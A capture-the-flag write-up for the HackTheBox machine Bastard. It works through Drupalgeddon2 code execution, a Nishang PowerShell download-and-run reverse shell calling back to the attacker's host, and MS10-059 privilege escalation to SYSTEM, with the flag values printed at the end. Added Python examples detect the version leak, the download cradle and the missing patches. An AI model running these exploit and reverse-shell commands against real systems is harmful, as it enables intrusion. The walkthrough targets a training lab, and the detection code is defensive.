HackTheBox Bastard

Writeup for HackTheBox Bastard

Machine Synopsis

Bastard is not overly challenging; however, it requires some knowledge of PHP in order to modify and use the proof of concept required for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems. (Source)

Key Exploitation Techniques:

  • Drupal 7.x Remote Code Execution (Drupalgeddon2 - CVE-2018-7600)
  • PowerShell Reverse Shell (Nishang)
  • Windows Kernel Privilege Escalation (MS10-059)

Enumeration

$ nmap -sC -sV -A 10.10.10.9 

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC

(Screenshot: website)

Attempts to brute-force the login page or register accounts were unsuccessful.

The CHANGELOG.txt file (listed in robots.txt, which only asks crawlers to skip it and does not restrict access, so it remained publicly readable) revealed the exact version: Drupal 7.54.

(Screenshot: changelog)
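The same observation is a useful self-check for anyone running Drupal 7. The following Python is an example added to this writeup (not part of the original post or of any Drupal tooling): it reads the newest release from the header of a Drupal 7 CHANGELOG.txt and flags anything earlier than 7.58, the release that shipped the fix for CVE-2018-7600 (SA-CORE-2018-002). The changelog text below is a constructed sample in the file's header format, not fetched from a live site.

```python
"""Flag a Drupal 7 install whose exposed CHANGELOG.txt predates the
Drupalgeddon2 (CVE-2018-7600 / SA-CORE-2018-002) fix.

Added example for this writeup; not from the original post or from Drupal.
"""
import re

# Drupal 7's CHANGELOG.txt starts each release block with a line such as
# "Drupal 7.54, 2017-02-01", newest release first.
_RELEASE_RE = re.compile(r"^Drupal\s+(\d+)\.(\d+)", re.MULTILINE)

# Drupal 7 release that fixed CVE-2018-7600.
FIXED_VERSION = (7, 58)

# Constructed sample modelled on the header layout; entry text is placeholder.
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- (constructed placeholder entry for the 7.54 release)
- (constructed placeholder entry for the 7.54 release)

Drupal 7.53, 2016-12-07
-----------------------
- (constructed placeholder entry for the 7.53 release)
"""


def newest_version(changelog_text):
    """Return (major, minor) of the first release listed, or None.

    The file ships unmodified with every release and lists the newest
    release first, so the first match is the installed version.
    """
    m = _RELEASE_RE.search(changelog_text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def vulnerable_to_drupalgeddon2(version):
    """True when a 7.x version is older than the 7.58 fix.

    Only the 7.x line is handled here; other branches return False.
    """
    if version is None or version[0] != 7:
        return False
    return version < FIXED_VERSION


def assess(changelog_text):
    """Summarise what an exposed changelog tells a defender."""
    version = newest_version(changelog_text)
    unpatched = vulnerable_to_drupalgeddon2(version)
    return {
        "version": None if version is None else f"{version[0]}.{version[1]}",
        "cve_2018_7600_unpatched": unpatched,
        "action": ("upgrade to Drupal 7.58 or later and block direct access to "
                   "CHANGELOG.txt" if unpatched else "no finding from changelog"),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_CHANGELOG))
```

Blocking CHANGELOG.txt at the web server hides the version banner, but only the upgrade removes the vulnerability; the check treats the version as the finding and the leaked file as the symptom.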

Exploitation

Initial Access (NT AUTHORITY\IUSR)

Drupal 7.54 is vulnerable to Drupalgeddon2 (CVE-2018-7600), a critical remote code execution vulnerability. The Ruby exploit script from dreadlocked's Drupalgeddon2 repository was used; it depends on the highline gem.

$ git clone https://github.com/dreadlocked/Drupalgeddon2
$ cd Drupalgeddon2
$ gem install highline
$ ruby drupalgeddon2.rb
Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication

The exploit identified the Drupal version and confirmed code execution, but could not find a writeable web path to drop a web shell, so it fell back to executing OS commands directly through the vulnerability.

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
[+] Found  : http://10.10.10.9/CHANGELOG.txt   (HTTP Response: 200)
[+] Drupal!: v7.54
...
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo SKJNUYPS
[+] Result : SKJNUYPS
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
...
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr

The shell within the drupalgeddon2 script confirmed execution as nt authority\iusr. To gain a more stable and interactive shell, Nishang’s Invoke-PowerShellTcp reverse shell was used.

The shell.ps1 script (containing Invoke-PowerShellTcp) was hosted on an attacker-controlled HTTP server.

# Attacker machine: Host shell.ps1
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

The PowerShell script was executed on the target via the Drupalgeddon2 shell.

drupalgeddon2>> powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.9/shell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 1234

A netcat listener was set up to catch the reverse shell.

# Attacker machine: Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.9] 49443
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54> whoami
nt authority\iusr

A stable PowerShell shell was obtained as nt authority\iusr.
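The hop from web shell to PowerShell reverse shell leaves distinctive traces on the host. The following Python is an example added to this writeup (not from the original post or from Nishang) that runs simple triage over constructed log records modelled on Windows process-creation (4688) and PowerShell script-block (4104) events. The field names are simplified assumptions, not the real event schema. It looks for the three things visible in the steps above: the IIS worker process (w3wp.exe) spawning powershell.exe, an IEX/DownloadString download cradle, and Nishang's Invoke-PowerShellTcp reverse-shell invocation.

```python
"""Triage rules for the web-server-to-PowerShell hop seen in this writeup.

Added example; not part of the original post or of Nishang.  Log records
are constructed and use simplified field names (assumption, not the real
Windows event schema).
"""
import re

# Download cradle: IEX/Invoke-Expression fed by a WebClient download, in
# either order ("iex (...).DownloadString(...)" or "...DownloadString(...) | iex").
CRADLE_RE = re.compile(
    r"(iex|invoke-expression)\b.*?(downloadstring|downloadfile|downloaddata)"
    r"|(downloadstring|downloadfile|downloaddata).*?\|\s*(iex|invoke-expression)",
    re.IGNORECASE | re.DOTALL,
)
# Nishang reverse TCP shell invocation.
NISHANG_RE = re.compile(r"invoke-powershelltcp\b.*?-reverse", re.IGNORECASE | re.DOTALL)
# Web server worker processes that should not normally launch PowerShell.
WEBSERVER_PARENTS = {"w3wp.exe", "php-cgi.exe", "httpd.exe", "nginx.exe"}


def scriptblock_indicators(script_text):
    """Indicator names matched by one script block's text."""
    hits = []
    if CRADLE_RE.search(script_text):
        hits.append("download_cradle")
    if NISHANG_RE.search(script_text):
        hits.append("nishang_reverse_tcp")
    return hits


def process_indicators(new_process, parent_process):
    """Indicator names for one process-creation record."""
    hits = []
    if (new_process.lower().endswith("powershell.exe")
            and parent_process.lower() in WEBSERVER_PARENTS):
        hits.append("webserver_spawned_powershell")
    return hits


def triage(events):
    """Return (record_index, [indicators]) for every suspicious record."""
    findings = []
    for i, ev in enumerate(events):
        if ev["event_id"] == 4688:
            hits = process_indicators(ev["new_process"], ev["parent_process"])
        elif ev["event_id"] == 4104:
            hits = scriptblock_indicators(ev["script_block"])
        else:
            hits = []
        if hits:
            findings.append((i, hits))
    return findings


# Constructed records.  Record 1 reuses the command line shown in this writeup.
SAMPLE_EVENTS = [
    {"event_id": 4688,
     "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_process": "w3wp.exe"},
    {"event_id": 4104,
     "script_block": "iex (New-Object Net.WebClient).DownloadString("
                     "'http://10.10.14.9/shell.ps1');Invoke-PowerShellTcp "
                     "-Reverse -IPAddress 10.10.14.9 -Port 1234"},
    {"event_id": 4104,
     "script_block": r"Get-ChildItem C:\inetpub\logs | Measure-Object"},
    {"event_id": 4688,
     "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_process": "explorer.exe"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"record {idx}: {', '.join(hits)}")
```

Script-block logging (4104) is what makes the second rule possible; without it the cradle is only visible in the process command line, which the attacker can obfuscate more easily. The parent-process rule needs no signature and catches the hop regardless of which PowerShell payload follows.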

Privilege Escalation

Windows Kernel Exploit (MS10-059)

systeminfo was used to gather operating system details for privilege escalation.

PS C:\inetpub\drupal-7.54> systeminfo
...
    Host Name:                  BASTARD
    OS Name:                    Microsoft Windows Server 2008 R2 Datacenter 
    OS Version:                 6.1.7600 N/A Build 7600
    System Type:                x64-based PC
    Hotfix(s):                  N/A
...

The system was identified as Microsoft Windows Server 2008 R2 Datacenter. Windows-Exploit-Suggester was used to identify applicable local privilege escalation exploits.

$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
$ mousepad systeminfo.txt
$ Windows-Exploit-Suggester/windows-exploit-suggester.py --update                             
$ Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2022-04-21-mssb.xls --systeminfo systeminfo.txt
...
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
...

The suggester highlighted MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799). The exploit for this vulnerability, Chimichurri.exe, was downloaded.
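The suggester's result follows directly from the systeminfo output: an RTM build with no hotfixes at all. The following Python is an example added to this writeup (not the original post's code and not Windows-Exploit-Suggester) that parses systeminfo text into fields and a hotfix set and reports the patch-level findings a defender would act on: a Windows 6.1 build below 7601 (Service Pack 1 never applied), an empty hotfix list, and the absence of KB982799, the update for MS10-059 named on this page. The second systeminfo sample is constructed to show a host that passes; its placeholder KB number is not a real update.

```python
"""Patch-level triage from systeminfo output.

Added example; not from the original post or from Windows-Exploit-Suggester.
The first sample reproduces the fields shown in this writeup; the second is
constructed to represent a patched host.
"""
import re

# "Key:   value" lines; keys are letters, digits, parens, slashes and spaces,
# so the indented "[01]: KB..." hotfix lines are not mistaken for fields.
FIELD_RE = re.compile(r"^[ \t]*(?P<key>[A-Za-z][A-Za-z0-9()/ ]*?):[ \t]+(?P<value>.*)$",
                      re.MULTILINE)
KB_RE = re.compile(r"\bKB\d+\b", re.IGNORECASE)

# Updates whose absence on a Windows 6.1 host is a finding.  KB982799 is the
# MS10-059 update referenced in this writeup.
REQUIRED_PATCHES_61 = {"KB982799": "MS10-059, Tracing Feature for Services EoP"}

SAMPLE_SYSTEMINFO = """
    Host Name:                  BASTARD
    OS Name:                    Microsoft Windows Server 2008 R2 Datacenter
    OS Version:                 6.1.7600 N/A Build 7600
    System Type:                x64-based PC
    Hotfix(s):                  N/A
"""

# Constructed: a host with SP1 and KB982799 applied.  KB1111111 is a placeholder.
SAMPLE_PATCHED = """
    Host Name:                  CONSTRUCTED-HOST
    OS Name:                    Microsoft Windows Server 2008 R2 Standard
    OS Version:                 6.1.7601 Service Pack 1 Build 7601
    System Type:                x64-based PC
    Hotfix(s):                  2 Hotfix(s) Installed.
                                [01]: KB982799
                                [02]: KB1111111
"""


def parse_systeminfo(text):
    """Return ({field: value}, {KB identifiers})."""
    fields = {m.group("key").strip(): m.group("value").strip()
              for m in FIELD_RE.finditer(text)}
    hotfixes = {kb.upper() for kb in KB_RE.findall(text)}
    return fields, hotfixes


def os_build(fields):
    """(major, minor, build) from the 'OS Version' field, or None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", fields.get("OS Version", ""))
    return tuple(int(x) for x in m.groups()) if m else None


def assess(text):
    """Patch-level findings for one systeminfo capture."""
    fields, hotfixes = parse_systeminfo(text)
    build = os_build(fields)
    findings = []
    if build and build[:2] == (6, 1):
        if build[2] < 7601:
            findings.append("pre-SP1 build 7600: Service Pack 1 never applied")
        for kb, desc in REQUIRED_PATCHES_61.items():
            if kb not in hotfixes:
                findings.append(f"{kb} missing: {desc}")
    if not hotfixes:
        findings.append("no hotfixes reported: host has never received updates")
    return {
        "host": fields.get("Host Name"),
        "os": fields.get("OS Name"),
        "build": build,
        "hotfixes": sorted(hotfixes),
        "findings": findings,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_SYSTEMINFO, SAMPLE_PATCHED):
        result = assess(sample)
        print(result["host"], result["build"], result["findings"] or "no findings")
```

Windows Server 2008 R2 RTM is build 7600 and SP1 is 7601, so the build number alone already shows that the host never took its service pack; the empty hotfix list confirms the same thing, and any kernel-level bulletin from 2010 onward is then in scope.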

Chimichurri.exe was hosted on an impacket SMB server for transfer to the target.

$ python /opt/impacket-0.9.19/examples/smbserver.py share .

On the target, net use was used to map the SMB share, and Chimichurri.exe was copied.

PS C:\inetpub\drupal-7.54> net use \\10.10.14.9\share
PS C:\inetpub\drupal-7.54> copy \\10.10.14.9\share\Chimichurri.exe

A netcat listener was started on the attacker machine. Chimichurri.exe was then run with the attacker's IP and the chosen port, which returned a reverse shell with nt authority\system privileges.

PS C:\inetpub\drupal-7.54> .\Chimichurri.exe 10.10.14.9 9999
$ nc -nlvp 9999             
listening on [any] 9999 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.9] 49447
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
nt authority\system
C:\inetpub\drupal-7.54>type dimitris\Desktop\user.txt
6be104d8d9844053846a3bada22a202c
C:\inetpub\drupal-7.54>type administrator\Desktop\root.txt
b31f4550141382cae0433214a2e97152

The user.txt and root.txt flags were located.

This post is licensed under CC BY 4.0 by the author.